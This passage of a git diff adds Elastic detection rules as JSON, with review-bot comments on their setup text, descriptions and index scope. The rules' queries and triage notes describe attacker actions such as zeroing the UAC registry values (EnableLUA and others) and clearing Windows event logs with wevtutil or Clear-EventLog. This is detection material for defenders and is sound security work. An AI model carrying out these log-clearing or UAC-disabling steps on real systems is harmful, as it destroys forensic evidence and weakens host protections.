Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.002", + "name": "Security Account Manager", + "reference": "https://attack.mitre.org/techniques/T1003/002/" + }, + { + "id": "T1003.003", + "name": "NTDS", + "reference": "https://attack.mitre.org/techniques/T1003/003/" + } + ] + } + ] + } + ], + "timestamp_override": 
"event.ingested", + "type": "eql", + "version": 111 + }, + "id": "d117cbb4-7d56-41b4-b999-bdf8c25648a0_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d12bac54-ab2a-4159-933f-d7bcefa7b61d_5.json b/packages/security_detection_engine/kibana/security_rule/d12bac54-ab2a-4159-933f-d7bcefa7b61d_5.json new file mode 100644 index 00000000000..39b7a69a234 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d12bac54-ab2a-4159-933f-d7bcefa7b61d_5.json 
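Review bot: The `setup` text tells operators to enable Object Access auditing for Event ID 4656 (handle requests), but the query is `process where host.os.type == "windows" and event.type == "start"` matching on `process.args` and `process.command_line`, so a 4656 record can never satisfy it; on the `logs-system.security*` index what the rule actually depends on is process-creation auditing with command-line inclusion, and an analyst following the current guidance would believe the rule is active when it is not. I would replace the Object Access block with `Audit Process Creation (Success)` plus `Administrative Templates > System > Audit Process Creation > Include command line in process creation events (Enabled)`, and keep the existing sentence about the rule only firing on a new cmd.exe/powershell.exe process. The `_110` copy of this rule in the same commit carries the same text, so the wording should be fixed in the upstream source rule rather than in one generated artifact.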
@@ -0,0 +1,97 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies an attempt to load a revoked or expired driver. Adversaries may bring outdated drivers with vulnerabilities to gain code execution in kernel mode or abuse revoked certificates to sign their drivers.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.library-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Expired or Revoked Driver Loaded", + "query": "driver where host.os.type == \"windows\" and process.pid == 4 and\n dll.code_signature.status : (\"errorExpired\", \"errorRevoked\")\n", + "references": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/hardware/design/dn653559(v=vs.85)?redirectedfrom=MSDN" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "dll.code_signature.status", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + } + ], + "risk_score": 47, + "rule_id": "d12bac54-ab2a-4159-933f-d7bcefa7b61d", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": 
"https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.001", + "name": "Invalid Code Signature", + "reference": "https://attack.mitre.org/techniques/T1036/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 5 + }, + "id": "d12bac54-ab2a-4159-933f-d7bcefa7b61d_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d22a85c6-d2ad-4cc4-bf7b-54787473669a_106.json b/packages/security_detection_engine/kibana/security_rule/d22a85c6-d2ad-4cc4-bf7b-54787473669a_106.json new file mode 100644 index 00000000000..55b96a4e815 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d22a85c6-d2ad-4cc4-bf7b-54787473669a_106.json 
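Review bot: The rule alerts on `dll.code_signature.status : ("errorExpired", "errorRevoked")` but ships with no `false_positives`, `note` or `setup` entries, leaving the analyst nothing to triage with; in my experience an expired signing certificate on a timestamped, still-loadable driver is far more common than a revoked one, so the two statuses do not carry the same signal and the expired case needs a stated caveat. At minimum I would add a `false_positives` entry along the lines of `"Drivers whose signing certificate was valid (and timestamped) at signing time but has since expired are still loaded by Windows and will match on errorExpired."` and a short `note` directing the analyst to pivot on the driver's signer and file hash and to confirm whether `errorRevoked` or `errorExpired` produced the alert. Whether the `errorExpired` branch deserves the same `risk_score` as revocation is worth deciding explicitly rather than by omission.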
@@ -0,0 +1,82 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation of a suspicious zip file prepended with special characters. Sandboxed Microsoft Office applications on macOS are allowed to write files that start with special characters, which can be combined with an AutoStart location to achieve sandbox evasion.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Potential Microsoft Office Sandbox Evasion", + "query": "event.category:file and host.os.type:(macos and macos) and not event.type:deletion and file.name:~$*.zip\n", + "references": [ + "https://i.blackhat.com/USA-20/Wednesday/us-20-Wardle-Office-Drama-On-macOS.pdf", + "https://www.mdsec.co.uk/2018/08/escaping-the-sandbox-microsoft-office-on-macos/", + "https://desi-jarvis.medium.com/office365-macos-sandbox-escape-fcce4fa4123c" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "d22a85c6-d2ad-4cc4-bf7b-54787473669a", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1497", + "name": "Virtualization/Sandbox Evasion", + "reference": "https://attack.mitre.org/techniques/T1497/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 106 + }, + "id": "d22a85c6-d2ad-4cc4-bf7b-54787473669a_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d31f183a-e5b1-451b-8534-ba62bca0b404_109.json b/packages/security_detection_engine/kibana/security_rule/d31f183a-e5b1-451b-8534-ba62bca0b404_109.json new file mode 100644 index 00000000000..c45fc084be5 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d31f183a-e5b1-451b-8534-ba62bca0b404_109.json 
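Review bot: The KQL query contains `host.os.type:(macos and macos)`, a duplicated term that is harmless at runtime but reads as a leftover from an edit; it should be `host.os.type:macos`. The `index` is the broad `logs-endpoint.events.*` while other rules in this same commit are narrowed to the producing data stream (`logs-endpoint.events.registry-*`, `logs-endpoint.events.process-*`); since this query is `event.category:file`, `logs-endpoint.events.file-*` would be consistent with them and avoid scanning process, network and library streams for every execution. If these files are generated from the detection-rules sources, both changes belong in the source rule.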
@@ -0,0 +1,139 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "User Account Control (UAC) can help mitigate the impact of malware on Windows hosts. With UAC, apps and tasks always run in the security context of a non-administrator account, unless an administrator specifically authorizes administrator-level access to the system. This rule identifies registry value changes to bypass User Access Control (UAC) protection.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Disabling User Account Control via Registry Modification", + "note": "## Triage and analysis\n\n### Investigating Disabling User Account Control via Registry Modification\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nAttackers may disable UAC to execute code directly in high integrity. This rule identifies registry value changes to bypass the UAC protection.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behaviors in the alert timeframe.\n- Investigate abnormal behaviors observed by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Analyze non-system processes executed with high integrity after UAC was disabled for unknown or suspicious processes.\n- Retrieve the suspicious processes' executables and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restore UAC settings to the desired state.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and event.type == \"change\" and\n registry.path :\n (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\EnableLUA\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\ConsentPromptBehaviorAdmin\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\PromptOnSecureDesktop\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\EnableLUA\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\ConsentPromptBehaviorAdmin\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\PromptOnSecureDesktop\"\n ) and\n registry.data.strings : (\"0\", \"0x00000000\")\n", + "references": [ + "https://www.greyhathacker.net/?p=796", + "https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings", + "https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-overview" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": 
"registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "d31f183a-e5b1-451b-8534-ba62bca0b404", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + }, + { + "id": "T1562", + "name": "Impair Defenses", + 
"reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + }, + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "d31f183a-e5b1-451b-8534-ba62bca0b404_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d31f183a-e5b1-451b-8534-ba62bca0b404_110.json b/packages/security_detection_engine/kibana/security_rule/d31f183a-e5b1-451b-8534-ba62bca0b404_110.json new file mode 100644 index 00000000000..3929c84936f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d31f183a-e5b1-451b-8534-ba62bca0b404_110.json 
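Review bot: The `description` in this hunk expands UAC as "User Access Control", which contradicts the rule name and the linked Microsoft docs; suggest `"...registry value changes to bypass User Account Control (UAC) protection."`. A second documentation point: of the three values the query matches, only `EnableLUA` = 0 actually disables UAC, while `ConsentPromptBehaviorAdmin` = 0 (elevate without prompting) and `PromptOnSecureDesktop` = 0 (prompt off the secure desktop) weaken it, so the triage note could ask the analyst to check which value was written (e.g. `registry.value`, where populated) before treating the host as UAC-off. This file is a superseded snapshot (the same change adds version 110 of the rule) and these JSONs look generated from an upstream rule source, so the wording fix presumably belongs there rather than in this copy.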
@@ -0,0 +1,139 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "User Account Control (UAC) can help mitigate the impact of malware on Windows hosts. With UAC, apps and tasks always run in the security context of a non-administrator account, unless an administrator specifically authorizes administrator-level access to the system. This rule identifies registry value changes to bypass User Access Control (UAC) protection.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.registry-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Disabling User Account Control via Registry Modification", + "note": "## Triage and analysis\n\n### Investigating Disabling User Account Control via Registry Modification\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nAttackers may disable UAC to execute code directly in high integrity. This rule identifies registry value changes to bypass the UAC protection.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behaviors in the alert timeframe.\n- Investigate abnormal behaviors observed by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Analyze non-system processes executed with high integrity after UAC was disabled for unknown or suspicious processes.\n- Retrieve the suspicious processes' executables and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restore UAC settings to the desired state.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and event.type == \"change\" and\n registry.path :\n (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\EnableLUA\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\ConsentPromptBehaviorAdmin\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\PromptOnSecureDesktop\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\EnableLUA\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\ConsentPromptBehaviorAdmin\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\PromptOnSecureDesktop\"\n ) and\n registry.data.strings : (\"0\", \"0x00000000\")\n", + "references": [ + "https://www.greyhathacker.net/?p=796", + "https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings", + "https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-overview" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": 
"registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "d31f183a-e5b1-451b-8534-ba62bca0b404", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + }, + { + "id": "T1562", + "name": "Impair Defenses", + 
"reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + }, + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "d31f183a-e5b1-451b-8534-ba62bca0b404_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d331bbe2-6db4-4941-80a5-8270db72eb61_111.json b/packages/security_detection_engine/kibana/security_rule/d331bbe2-6db4-4941-80a5-8270db72eb61_111.json new file mode 100644 index 00000000000..8caf1833fad --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d331bbe2-6db4-4941-80a5-8270db72eb61_111.json 
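Review bot: The `description` still reads "User Access Control (UAC)" in this current version of the rule; it should be `"User Account Control (UAC)"` to match the `name` field and the Microsoft references. The rule title says "Disabling", but two of the three matched values (`ConsentPromptBehaviorAdmin` = 0 and `PromptOnSecureDesktop` = 0) weaken UAC rather than turn it off, and only `EnableLUA` = 0 disables it; the triage note would be more useful if it told analysts to look at which value was set and to treat a lone `PromptOnSecureDesktop` change as a weaker signal. The false-positive section says this "is unlikely to happen legitimately", which is fair for `EnableLUA`, but a Group Policy that configures the consent-prompt behaviour will rewrite these values on policy refresh, so a hedge about policy-driven writes (exception on the writing process, if the data shows it) would help. As these rule files appear generated from an upstream source, the fix should land there.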
@@ -0,0 +1,109 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to clear or disable Windows event log stores using Windows wevetutil command. This is often done by attackers in an attempt to evade detection or destroy forensic evidence on a system.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Clearing Windows Event Logs", + "note": "## Triage and analysis\n\n### Investigating Clearing Windows Event Logs\n\nWindows event logs are a fundamental data source for security monitoring, forensics, and incident response. Adversaries can tamper, clear, and delete this data to break SIEM detections, cover their tracks, and slow down incident response.\n\nThis rule looks for the execution of the `wevtutil.exe` utility or the `Clear-EventLog` cmdlet to clear event logs.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - Verify if any other anti-forensics behaviors were observed.\n- Investigate the event logs prior to the action for suspicious behaviors that an attacker may be trying to cover up.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. 
Analysts can dismiss the alert if the administrator is aware of the activity and there are justifications for this action.\n- Analyze whether the cleared event log is pertinent to security and general monitoring. Administrators can clear non-relevant event logs using this mechanism. If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n - This activity is potentially done after the adversary achieves its objectives on the host. Ensure that previous actions, if any, are investigated accordingly with their response playbooks.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n(\n (\n (process.name : \"wevtutil.exe\" or ?process.pe.original_file_name == \"wevtutil.exe\") and\n process.args : (\"/e:false\", \"cl\", \"clear-log\")\n ) or\n (\n process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") and\n process.args : \"Clear-EventLog\"\n )\n)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "d331bbe2-6db4-4941-80a5-8270db72eb61", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + 
